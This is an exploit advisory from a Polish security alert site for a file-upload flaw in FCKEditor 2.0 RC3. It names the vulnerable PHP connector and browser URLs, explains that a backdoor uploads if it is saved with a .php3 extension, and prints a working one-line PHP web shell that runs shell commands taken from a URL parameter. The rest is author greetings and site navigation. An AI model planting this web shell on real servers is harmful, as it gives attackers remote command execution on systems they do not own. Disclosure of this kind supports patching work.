FCKEditor 2.0 RC3 shell upload vulnerability

Tekst :

FCKEditor Shell Upload Exploit
------------------------------

Web-App: FCKEditor.
Version: Version 2.0 RC3 (Release Candidate 3).
Link : http://sourceforge.net/projects/fckeditor/files/FCKeditor/
Author : Aodrulez.
Email : f3arm3d3ar@gmail.com

Vulnerable File :
-----------------

http://127.0.0.1/editor/filemanager/browser/default/connectors/php/connecto
r.php

Vulnerable Link :
-----------------
http://127.0.0.1/editor/filemanager/browser/default/browser.html?Connector=
/editor/filemanager/browser/default/connectors/php/connector.php

Exploit :
---------

You can upload a php backdoor with this
extension: .php3

Sample Backdoor:(save as "any_name.php3")
-----------------------------------------
<? system($_GET["cmd"]); ?>

Greetz Fly Out To :
-------------------
Amforked() : My Mentor.
The Blue Genius : My Boss.
str0ke : Tnx a Ton 4 everythin!
www.orchidseven.com
www.isac.org.in

Bezpieczeństwo informacji

Wiadomości IT

Dodaj wiadomość

Szukaj

Baza SecurityAlert

O SecurityAlert

Baza ExploitAlert

Badania SecurityReason

Baza WLB

Dodaj Note WLB

O WLB

Informacje

Harmonogram

Cena

Referencje

Kontakt

Wiadomości

SecurityAlert

ExploitAlert

Apache

PHP

WLB

Kontakt

Informacje o firmie

Apache HTTP Server Denial
of Service Vulnerability

Multiple Vendors
libc/fnmatch(3) DoS (incl
apache poc)

Apache Continuum
cross-site scripting
vulnerability

Apache Tomcat DoS
Vulnerability

PHP Hashtables Denial of
Service

PHP 5.3.6 multiple null
pointer dereference

PHP 5.3.6 ZipArchive
invalid use glob(3)

libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)